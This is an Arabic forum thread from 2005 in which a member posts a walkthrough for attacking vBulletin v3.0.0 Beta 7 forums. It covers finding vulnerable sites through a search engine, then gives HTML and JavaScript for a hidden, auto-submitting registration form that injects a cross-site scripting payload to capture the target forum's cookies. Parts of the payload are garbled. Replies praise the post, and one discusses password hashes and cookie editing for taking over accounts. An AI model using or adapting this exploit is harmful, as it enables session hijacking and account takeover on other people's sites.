التسجيل التعليمات قائمة الأعضاء التقويم البحث مشاركات اليوم اجعل جميع المنتديات مقروءة

العودة   منتديات الحمادين > المنتديات التقنية > منتدى الكمبيوتر والأنترنت

منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا

الإهداءات
آورنس من قلب مغليك اليوم 07:27 PM
هلابكم جميعاً ******** ابو عبدالله الحميداني منور ******** فقدناك يالعلامه الف مرحبا ومسهلا فيك تو ما انور المنتدى تحياتي آورنــــــــس

دلوعة زماني من المنتدى الحزين اليوم 06:58 AM
صباحوووو اخباركم ياعضائنااا********وينكم لاحس ولاخبر المنتدى ناايم يبي من يحركه ليش كذاا هجرتووه********

البرنس من قلبــــي يوم أمس 12:19 AM
مســــاء الخـــــير ************ انا احــــــبكم

غنام العرافه من المجلس 14-May-2008 04:13 PM
أمسي على الجميع وأقول وين الربع عسى المانع خير أن شاء الله لا حس ولا خبر 0

محمد ابن عقوب من مااااااي هوووووم 13-May-2008 11:08 PM
مساااااء غريب يسوود البؤس والشقاء ولكن لا حياة مع اليأس ولا يأس مع الحياة مساااء الخيرااات جميعاً


ثغرة فى منتديات vb

ثغرة فى منتديات vb منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا ثغرة فى منتديات vb منتدى الكمبيوتر والأنترنت جديد ثغرة فى منتديات vb  جميع البرامج الجديده وحلول المشاكل تجدها هنااجمد ثغرة فى منتديات vb افضل ثغرة فى منتديات vb

ثغرة فى منتديات vb

-

ثغرة فى منتديات vb

-

ثغرة فى منتديات vb

ثغرة فى منتديات vb

-

ثغرة فى منتديات vb

-

ثغرة فى منتديات vb

- ثغرة فى منتديات vb

ثغرة فى منتديات vb : ثغرة فى منتديات vb

منتدى الكمبيوتر والأنترنت : منتدى الكمبيوتر والأنترنت

رد
 
أدوات الموضوع إبحث في الموضوع
  #1  
قديم 19-Mar-2005, 05:23 PM
islamm2003 islamm2003 غير متواجد حالياً
عـضـو جديد
 
تاريخ التسجيل: Mar 2005
العمر: 26
المشاركات: 13
ثغرة فى منتديات vb

بسم الله الحمن الرحيم
--------------------------------
الكاتب :islamm2003
الحقوق محفوظه للكاتب islamm203
--------------------------
الثغره موجوده في منتديات vBulletin v3.0.0 Beta 7 والكثير من المنتديات مصابه
--------------------------------
اول شئ روح لموقع البحث مثل
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]


ابحث عن هذه الكلمه
vBulletin v3.0.0 Beta 7



----------------------------------------------
خود هذه الكود وضعه في المفكره Notepad وحفظه بمنداد html



كود:


كود:
<form action="http://[VICTIM - FORUM PATH]/register.php?do=register"
method="post" style="display:none">
<input type="hidden" name="s" value="" />
<input type="hidden" name="regtype" value="1" />
<input type="text" class="bginput" name="field1" value="" size="25"
maxlength="250" />
<input type="hidden" name="url" value="index.php" />
<input type="hidden" name="do" value="addmember" /> </form> <script>
//Code that will be executed
var xss = "\"><script>alert(document"+".ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر)<\/script>";
document.forms(0).field1.value=xss;
document.forms(0).submit();
</script>
---------------------------------------------------------------

مثل هذه الموقع مصاب بالثغره
[فقط الأعضاء المسجلين والمفعلين يمكنهم رؤية الوصلات . إضغط هنا للتسجيل]

غير في الكود [VICTIM - FORUM PATH]/ الي المنتديات المصابه



احفظ الملف بمتداد html


------------------------------------------------
افتح ملف الهوتمل هيظهر ليك الكوكيز للـ المنتدي المصاب الان



الان انت عارف الباقي عن طريق برنامج ابو عمرابو عمرابو عمرابو عمرابو عمرابو عمر Editor واكيد استخدمته في ثغره last10.php

تحياتي
رد مع اقتباس
  #2  
قديم 20-Mar-2005, 03:19 AM
الصورة الرمزية الدويله
الدويله الدويله غير متواجد حالياً
[ مـتـمـيـز ]
 
تاريخ التسجيل: Mar 2005
الدولة: حيث ماكنت أكون
العمر: 26
المشاركات: 423
اخوي islamm2003 بارك الله فيك وماقصرت

مجهود تشكر عليه بصراحه

لا شلت يمينك اخي

مواضيعك متميزه دائما كتميز صاحبها

ننتظر المزيد
رد مع اقتباس
  #3  
قديم 13-Apr-2005, 04:19 PM
ابو سارة ابو سارة غير متواجد حالياً
مشرف المنتديات العامه
 
تاريخ التسجيل: Apr 2005
العمر: 29
المشاركات: 177
مشاركة: ثغرة فى منتديات vb

islamm2003


يعطيك العافيه اخوي وماقصرت

ومجهود رائع
__________________
[poem font="Simplified Arabic,4,blue,normal,normal" bkcolor="transparent" bkimage="backgrounds/20.gif" border="double,7,darkblue" type=0 line=0 align=center use=ex num="0,black"]
من يجهل أسلوب المكر عاش محتار= ومن يلبس ثياب الكبر مات عـاري
والدمعه اللي تحتري حزن الأعـذار= ماظنها تنفـع ضعيـف المـواري
ماللصقر حشمـه وقيمـه ومقـدار= أن كان مايدمي صـدور الحبـاري[/poem]
رد مع اقتباس
  #4  
قديم 20-Apr-2005, 03:13 PM
الخـارج عن القـانون الخـارج عن القـانون غير متواجد حالياً
عـضـو مـاسـي
 
تاريخ التسجيل: Apr 2005
الدولة: تورا بورا
العمر: 28
المشاركات: 148
مشاركة: ثغرة فى منتديات vb

اخوي اسلام ما قصرت ويعطيك العافيه.... بس الثغره قديمه شوي :) وغير كذا للأسف الباس ورد اللي تنتج عن هذي الثغره هي باس ورد مشفره تشفير md5 والمصيبه العضما انها تختلف عن تشفير الجيل الثاني للمنتديات المصابه هذا النوع اللي هو الجيل الثالث مشفر تشفير md5 معقد ومضيوف عليه خانتين وهميات يعني مشفر مرتين الشي اللي يجعل فكه مستحيل اذاً الحل هنا هو معدل الكوكيز وهذا ايضاً ما ينفع مع التشفير مرتني للجيل الثالث فهوه يتخدم نضام اخر زيارة.... على العموم انت ما قصرت ويعطيك العافيه ومشكورررر :)
رد مع اقتباس
رد


يشاهد محتوى الموضوع الآن : 1 ( 0 عضو - 1 زائر )
 
أدوات الموضوع إبحث في الموضوع
إبحث في الموضوع:

البحث المتقدم

إخفاء/عرض تعليمات المشاركة
و
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are معطلة

ثغرة فى منتديات vb ثغرة فى منتديات vb ثغرة فى منتديات vb ثغرة فى منتديات vb ثغرة فى منتديات vb
ثغرة فى منتديات vb منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا
ثغرة فى منتديات vb

ثغرة فى منتديات vb منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا
ثغرة فى منتديات vb منتدى الكمبيوتر والأنترنت جميع البرامج الجديده وحلول المشاكل تجدها هنا ثغرة فى منتديات vb

ثغرة فى منتديات vb ثغرة فى منتديات vb

منتدى الكمبيوتر والأنترنت منتدى الكمبيوتر والأنترنت


جميع الأوقات بتوقيت GMT +4. الساعة الآن 09:25 PM.


Powered by vBulletin® Version 3.7.0 Beta 3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.

SEO by bdr130.net 3.0.0

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58